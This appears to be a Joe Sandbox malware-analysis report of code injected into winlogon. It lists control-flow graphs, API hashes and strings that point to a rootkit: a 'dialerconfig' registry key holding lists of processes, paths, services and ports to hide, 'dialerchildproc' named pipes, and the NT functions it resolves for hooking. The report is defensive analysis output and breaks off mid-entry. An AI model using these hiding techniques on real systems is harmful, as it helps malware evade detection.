                                            control_flow_graph 352 225dc672908-225dc672973 call 225dc670f34 * 4 361 225dc672b8b 352->361 362 225dc672979-225dc67297c 352->362 363 225dc672b8d-225dc672ba9 361->363 362->361 364 225dc672982-225dc672985 362->364 364->361 365 225dc67298b-225dc67298e 364->365 365->361 366 225dc672994-225dc6729b2 VirtualAlloc 365->366 366->361 367 225dc6729b8-225dc6729dc call 225dc670d6c 366->367 370 225dc672a0b-225dc672a12 367->370 371 225dc6729de-225dc672a09 call 225dc670d6c 367->371 373 225dc672a18-225dc672a25 370->373 374 225dc672ab2-225dc672ab9 370->374 371->370 373->374 378 225dc672a2b-225dc672a39 373->378 376 225dc672b6c-225dc672b89 374->376 377 225dc672abf-225dc672ad6 374->377 376->363 377->376 379 225dc672adc 377->379 385 225dc672a3b-225dc672a45 378->385 386 225dc672a9d-225dc672aa5 378->386 381 225dc672ae2-225dc672af7 379->381 383 225dc672b5b-225dc672b66 381->383 384 225dc672af9-225dc672b0a 381->384 383->376 383->381 389 225dc672b0c-225dc672b13 384->389 390 225dc672b15-225dc672b19 384->390 391 225dc672a48-225dc672a4c 385->391 386->378 387 225dc672aa7-225dc672aac 386->387 387->374 392 225dc672b48-225dc672b59 389->392 393 225dc672b1b-225dc672b22 390->393 394 225dc672b24-225dc672b28 390->394 395 225dc672a9a 391->395 396 225dc672a4e-225dc672a52 391->396 392->383 392->384 393->392 397 225dc672b3a-225dc672b3e 394->397 398 225dc672b2a-225dc672b38 394->398 395->386 399 225dc672a54-225dc672a7b 396->399 400 225dc672a7d-225dc672a87 396->400 397->392 401 225dc672b40-225dc672b43 397->401 398->392 402 225dc672a8d-225dc672a98 399->402 400->402 401->392 402->391
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: 4b28b13bbc6e47e71a7054b23a38bb8b44a856d0b11ab48412ece4213b3be521
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: D961222A701A62D3EE69CFA9D44876CB391FB04B99F14C821DA1907BC5DB38E852C700

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: AllocHeap
                                            • String ID:
                                            • API String ID: 4292702814-0
                                            • Opcode ID: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                            • Instruction ID: cc9918f6b3098a29d4ae8dc7f61338113fbc7ed24898dabb4ac6ceb7f2f2d2e0
                                            • Opcode Fuzzy Hash: 7008843d37b5d2592f09503c2cc2e5c46d4d2a98a89d16425b7e60fac814ddf9
                                            • Instruction Fuzzy Hash: 1DF01DAC701E25A1FE59EBEE945939512856FC5B42F6CD934CD0AC63D2DE3CC485C210
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 13e21aab0bda9cc4e5bc9a85af016e9a731f36370949422a27c399fe7f801b24
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: 1FB1A16A22CE74A1EBA58FADC4487A973A4FB44F86F649066EE0A53794DF35CC41C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 49891a77d833b8966d7278af0461f95e2a538990b23d8f8f70f933d8b27bc86b
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: 5FB1B17A250E60A1EB69CFADD4487A9A3A5FB44B86F64D026EE0D93794DF35CC81C340
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: 74af288e059d5c8d23f4d410f0be3976c1ac1cdc9bcb8f1d8e07bdf2c6108118
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 0C318376219F90A6EB60DFA4E8447ED7360F784B45F44852ADB4E47B98EF38C648CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: 5ec5ec95e36d2b9761df2f19de70415926bf578208c2e4ee6b643ac6d1fcaa5d
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 28313C76304F90A5EB60DFA4E8443DA7361F788749F44842ADA4D47B98EF38C648CB10
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: 31acfc79b5b35cb9e1e8501721361a76cb7a9afdb4b51760c87d5441e5bab70d
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: 5E31923A218F90A6DB60CF79E84439E73A4F788B55F504526EB9E43B95DF38C545CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: 44c8f18018911a0facef0ed95575b6cc75af72e29172093ed9c2daae054a5ba8
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: AD31A43A304F90A6DB60CF69E84439E73A5F788B59F504126EB9D83BA8DF38C545CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: fe454cc261bdb08bb9bf612984af53997641b1df6e52c17f631db44c18d12b1f
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: 25E1043A728FA0AAE710CFA8D4882DD7BB1F3457C9F248516DF4A57B99DA34C51AC700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: b035fcf8bd0f82df1f998d612e57b17a4f66fc1ce02ecce0c6057b00589d60e0
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: 61E1F37A714FA0AAE710CFA8D4882DD7BB2F74578AF148116DF4E57B99DA38C41AC700
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                            • Instruction ID: cd021be3b7f994735f8efe401c0160f1a902b8f3b311327af9ee367ef9e6a18a
                                            • Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                            • Instruction Fuzzy Hash: A551FB2A71CFA0A4FB20DBBAE90879E7BA5B784BD5F148154EE5A47F95CB34C141C700
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                            • Instruction ID: 7adad651a12d3839833733cc8669bc6712da98d5366a51697aca83eeb9324270
                                            • Opcode Fuzzy Hash: be94a610b278d4561b7c220ec9190d73b31c2b82deb3cd86083bedb6f088a8c3
                                            • Instruction Fuzzy Hash: A651EB36704FA0A4FB20DBBAA90839E7BE5B785BD5F248215EE5887B95CB35C541C700
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                            • Instruction ID: cc696e65a456b63b99bc5d4aa4762c6fec622c4d598d1fb74e675c82790ada62
                                            • Opcode Fuzzy Hash: c472934a709f1b1001af0d924fa8e09930e5dba58a63be07c7f312c63124a0d7
                                            • Instruction Fuzzy Hash: E8F096B57146A49BEBA4CF6CA846B19B7E0F3083C6F80C529D68AC3B04D33C8461DF04

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 439 225dc6a1650-225dc6a16e2 GetProcessHeap call 225dc6b3170 call 225dc6a1274 call 225dc6a1000 call 225dc6a1274 * 3 call 225dc6a1000 * 3 RegOpenKeyExW 458 225dc6a18ce-225dc6a18d8 439->458 459 225dc6a16e8-225dc6a170f RegOpenKeyExW 439->459 460 225dc6a1711-225dc6a1715 459->460 461 225dc6a1727-225dc6a1749 RegOpenKeyExW 459->461 462 225dc6a1718 call 225dc6a12c8 460->462 463 225dc6a1762-225dc6a1784 RegOpenKeyExW 461->463 464 225dc6a174b-225dc6a174f 461->464 468 225dc6a171d-225dc6a1721 RegCloseKey 462->468 466 225dc6a179d-225dc6a17bf RegOpenKeyExW 463->466 467 225dc6a1786-225dc6a178a 463->467 465 225dc6a1753 call 225dc6a104c 464->465 469 225dc6a1758-225dc6a175c RegCloseKey 465->469 471 225dc6a17c1-225dc6a17c5 466->471 472 225dc6a17d8-225dc6a17fa RegOpenKeyExW 466->472 470 225dc6a178e call 225dc6a12c8 467->470 468->461 469->463 473 225dc6a1793-225dc6a1797 RegCloseKey 470->473 474 225dc6a17c9 call 225dc6a12c8 471->474 475 225dc6a1813-225dc6a1835 RegOpenKeyExW 472->475 476 225dc6a17fc-225dc6a1800 472->476 473->466 477 225dc6a17ce-225dc6a17d2 RegCloseKey 474->477 479 225dc6a184e-225dc6a1870 RegOpenKeyExW 475->479 480 225dc6a1837-225dc6a183b 475->480 478 225dc6a1804 call 225dc6a12c8 476->478 477->472 484 225dc6a1809-225dc6a180d RegCloseKey 478->484 482 225dc6a1872-225dc6a1876 479->482 483 225dc6a1889-225dc6a18ab RegOpenKeyExW 479->483 481 225dc6a183f call 225dc6a104c 480->481 485 225dc6a1844-225dc6a1848 RegCloseKey 481->485 486 225dc6a187a call 225dc6a104c 482->486 487 225dc6a18ad-225dc6a18b1 483->487 488 225dc6a18c4-225dc6a18c8 RegCloseKey 483->488 484->475 485->479 489 225dc6a187f-225dc6a1883 RegCloseKey 486->489 490 225dc6a18b5 call 225dc6a104c 487->490 488->458 489->483 491 225dc6a18ba-225dc6a18be RegCloseKey 490->491 491->488
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                            • String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                            • API String ID: 106492572-2879589442
                                            • Opcode ID: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction ID: c2b27e60f9833f8a4efb5a46521195ba81d972db8b51ad94bb129a824eb49aba
                                            • Opcode Fuzzy Hash: 1a30f3953b7b2857fef7ab9bb527f69cc88a70ac074ccf0af09289a77df583cb
                                            • Instruction Fuzzy Hash: D3711C3A310E64E5EB10DFAAE85869937B5FB84B8AF509121DE4D87B69DF38C445C300

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: c77c60887f5eec905f9c55c612795a7d8c3603e9356656533834664b1217e901
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: 61518EBA218F54A3EB24DFAAE54839AB3A1F788F85F148125DB4A07B14DF38C055C740

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: 70b2d72f91b6f18ded63beffd86d0ff829e6467697ea3820cc6d5b1da63263f4
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: 8B518DBA604F54E7EB14CFAAE54839AB3A6F788F82F148125DB4A47B14DF38D055CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: 197445dab69a72c6b2701a4be11a1dbf2a87165c78cac1134486ad74d2a900e6
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: 263197AC128D7AB1EB06EFEDE8596E43321B784746FF0D553E61A031A69E38C249C340
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: f2345c7f7979f1a5c9112095c6936f51b981acc03c2bb6a2f92852ef080b524c
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: 4A31BB6C290D6AB0FB06EFEDE85D6D42322B744347FE0D413E91E522669F38964DC390
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 97d4650460fd1ed870c178f8d23a3eff64fab07327a250838c03ffd6b33ea587
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: 8721217A628F50A3F710CB69E54835A77A0F789FA5F608215EA5907BA8DF3CC149CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 7f380fac14d76415e31badb251968f92843777bce0a839fde5f99f266927d741
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: BD214F3A718F50A3F710CB69E54835A73A1F789BA6F508215EA5942BA9CF3CC149CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: ca7602a269add0734a0897c8356ebd1df981e37aa2bd2fa69252cf5db3528a0f
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: FB418077218B90E7E7648FA6E44879AB7A1F389B85F008125DB8A07B54DF38D165CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: 000ac5439b4c2b0402a745fed071cd3e56bcaa970eac8b3becf1ef1e8607b3c3
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction Fuzzy Hash: D641A177214F90E7E760CFA6E44839AB7A1F388B8AF108125EB8947B54DF38D564CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2969270033.00000225DC610000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC610000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc610000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 03597595ed45fa0fe2af49a01b95c5b3d39fbf82cb5407b1408a8d0594ee632b
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: A581222D702E71BAFE60ABEE944939967E0EB95783F44C025AF4643792DB38C946C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2972685274.00000225DC670000.00000040.00000400.00020000.00000000.sdmp, Offset: 00000225DC670000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc670000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 082c9bc8e2b54f33c06a4e0ce0c83183c50a5791486485f9408bd7432f1d1996
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 9281F429610E61A6FE51EBEEA84D39927D0EB45782F14C825AB0543FD6DB78C886CB01
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: d6c8d0038f703ef3555841080360c3dda4cb30d5e061eb806b4afe574bebbefd
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: 8F81E43C71CEB1BAFB50ABED984D3993291AB85B82F54C4A59A07477D6DB38C845CF00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
                                            • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
                                            • String ID:
                                            • API String ID: 190073905-0
                                            • Opcode ID: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction ID: 491271a197424cec7ae9611870d67ced497b27d19dd61c21874c764fcc7bcc48
                                            • Opcode Fuzzy Hash: 95b57d6277a84fb56418f177327e884c31f38a66bae6651e6bdbad69dc24b832
                                            • Instruction Fuzzy Hash: DE81A029704E61B6FB54EBED98493996291BB85B8BF28C0359A05C7796DF38C841CF10
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2970385627.00000225DC640000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC640000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc640000_winlogon.jbxd
                                            Similarity
                                            • API ID: Library$Load$AddressErrorFreeLastProc
                                            • String ID: api-ms-
                                            • API String ID: 2559590344-2084034818
                                            • Opcode ID: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction ID: a20be75b842d5dbd9bbbcbb21bfa971a606c85aff1cb8e04c4579895d74161fa
                                            • Opcode Fuzzy Hash: b7fd7646394baccca3f1b1048765e4d0241f371571e58ba301572f288adf5d58
                                            • Instruction Fuzzy Hash: 5A31A63925EF60B5EE129B9EA8087997398B709FA6F198965DD2F47344DF38C446C300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.2973806472.00000225DC6A0000.00000040.00000001.00020000.00000000.sdmp, Offset: 00000225DC6A0000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_225dc6a0000_winlogon.jbxd
                                            Similarity
